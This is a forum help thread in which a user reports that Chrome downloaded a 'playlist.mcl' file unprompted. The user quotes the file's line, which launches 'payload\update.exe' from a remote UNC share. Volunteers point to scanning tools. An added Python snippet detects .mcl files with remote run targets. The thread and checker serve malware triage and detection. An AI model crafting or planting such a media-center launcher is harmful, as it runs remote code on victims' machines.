Author Topic: .mcl Virus?  (Read 12998 times)


REDACTED

  • Guest
.mcl Virus?
« on: October 13, 2015, 10:42:44 PM »
I was on Google Chrome, when suddenly and randomly a file named "playlist.mcl" notified as downloaded at the bottom of the screen. I closed Chrome immediately.

I copied it to an old laptop and opened it with Notepad. When opened in Notepad it reads:

<application run="\\XX.XX.XX.XX(I have removed the numbers in case they amount to personal info, don't know what they are)\Users\Administrator\Desktop\payload\update.exe"/>

It says .mcl is a file type associated with Windows Media Center.

I hope I've done the right (read: okay) thing so far, but was very shocked that Chrome downloaded this without my permission and don't know what to do now.

REDACTED

  • Guest
Re: .mcl Virus?
« Reply #1 on: October 13, 2015, 10:45:14 PM »
Hi,

Try sending it to http://www.virustotal.com and paste the link.

REDACTED

  • Guest
Re: .mcl Virus?
« Reply #2 on: October 13, 2015, 10:52:21 PM »
Not sure what you mean. I assume you mean run the scan on that site and post the results?
I'm scared to open Chrome!

REDACTED

  • Guest
Re: .mcl Virus?
« Reply #3 on: October 13, 2015, 11:45:12 PM »
Okay, I tested it on the site you mentioned.

It seems to think it is fine (lots of green ticks), but it evidently isn't.

Interestingly, it says the same file has been submitted before: the last time being 5 hours ago -- but the first time it was ever submitted? Only 1 day, 1 hour ago!

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37529
  • Not a avast user
Re: .mcl Virus?
« Reply #4 on: October 13, 2015, 11:49:49 PM »
Can you post the VirusTotal scan link?




REDACTED

  • Guest
Re: .mcl Virus?
« Reply #6 on: October 14, 2015, 12:07:53 AM »
The part that worries me the most is how it downloaded itself like that!

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37529
  • Not a avast user
Re: .mcl Virus?
« Reply #7 on: October 14, 2015, 12:09:20 AM »
Seems OK. Were you on any music / video download site?


If you want a check ....


Instructions  https://forum.avast.com/index.php?topic=53253.0
Attach Malwarebytes and Farbar Recovery Scan Tool logs ....  3 logs total


See below the box you write in ... Attachments and other options


The malware expert team will be online tomorrow and assist you.



REDACTED

  • Guest
Re: .mcl Virus?
« Reply #8 on: October 14, 2015, 12:15:52 AM »
I had a lot of tabs open, but nothing out of the ordinary, no music or video download site, unless you count YouTube as one!

I will try those scans, but removing this file itself is easy. I want to know how it downloaded itself most of all, I didn't know that was possible!

REDACTED

  • Guest
Re: .mcl Virus?
« Reply #9 on: October 14, 2015, 12:30:16 AM »
http://blog.trendmicro.com/trendlabs-security-intelligence/windows-media-center-hacking-team-bug-fixed-in-september-2015-patch-tuesday/

I feel like this is relevant. I think the file isn't being picked up as problematic or malicious because it is normally a harmless file type...
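
Added example, not part of the original thread: a small Python check that looks at what an .mcl file asks to run rather than at its file type, which is the gap the post above describes. The sample inputs are constructed (the host 192.0.2.10 is a documentation-range placeholder, not the address from the thread), and the names `inspect_mcl`, `SAMPLE_MCL` and `LOCAL_MCL` are hypothetical.

```python
import re
import xml.etree.ElementTree as ET

# Constructed samples modelled on the line quoted in the first post.
SAMPLE_MCL = r'<application run="\\192.0.2.10\Users\Administrator\Desktop\payload\update.exe"/>'
LOCAL_MCL = r'<application run="C:\Program Files\Example\notes.txt"/>'

UNC_RE = re.compile(r'^\\\\(?P<host>[^\\/]+)[\\/]')   # \\host\share\...
URL_RE = re.compile(r'^[a-zA-Z][a-zA-Z0-9+.-]*://')   # scheme://...
EXEC_EXTS = ('.exe', '.scr', '.com', '.bat', '.cmd', '.ps1', '.vbs', '.js', '.msi')


def _refused(reason):
    # A file that cannot be inspected safely is treated as suspicious.
    return [{'target': None, 'suspicious': True, 'reasons': [reason]}]


def inspect_mcl(text):
    """Return one finding per <application run="..."> element in .mcl text."""
    # The file is untrusted input: refuse DTD/entity declarations before parsing.
    if re.search(r'<!(DOCTYPE|ENTITY)', text, re.IGNORECASE):
        return _refused('contains a DTD or entity declaration')
    try:
        root = ET.fromstring(text)
    except ET.ParseError as exc:
        return _refused('not well-formed XML: %s' % exc)

    findings = []
    for elem in root.iter('application'):   # iter() includes the root element
        target = elem.get('run')
        if target is None:
            continue
        reasons = []
        unc = UNC_RE.match(target)
        if unc:
            reasons.append('run target is on remote host %s (UNC path)' % unc.group('host'))
        elif URL_RE.match(target):
            reasons.append('run target is a URL')
        remote = bool(reasons)
        if target.strip().lower().endswith(EXEC_EXTS):
            reasons.append('run target is an executable or script')
        # "suspicious" here means the file launches something from a remote location.
        findings.append({'target': target, 'suspicious': remote, 'reasons': reasons})
    return findings


if __name__ == '__main__':
    for finding in inspect_mcl(SAMPLE_MCL):
        print(finding)
```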

REDACTED

  • Guest
Re: .mcl Virus?
« Reply #10 on: October 14, 2015, 01:09:59 AM »
Here's the Malwarebytes one...

REDACTED

  • Guest
Re: .mcl Virus?
« Reply #11 on: October 14, 2015, 01:36:38 AM »
Just checking I'm supposed to post the next ones (FRST.txt and Addition.txt) here, it looks like information that shouldn't be shared, but I don't know anything. :P

Offline mikaelrask

  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1556
Re: .mcl Virus?
« Reply #12 on: October 14, 2015, 07:35:36 AM »
Hey lupin, yes, please also attach the logs from FRST + Addition. A malware expert will help you from there :)
Windows 8.1 amd a10-5700 64 bit
12 GB ram 1 tb hard drive. Avast 18, MBAM

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37529
  • Not a avast user
Re: .mcl Virus?
« Reply #13 on: October 14, 2015, 09:19:37 AM »
When the malware expert is done, you can edit your post and delete the logs if you want.


REDACTED

  • Guest
Re: .mcl Virus?
« Reply #14 on: October 14, 2015, 07:20:19 PM »
Okay, here they are.
I have removed a couple of unrelated personal documents from one of them, but otherwise kept them as is.

I hope they help figure out the situation.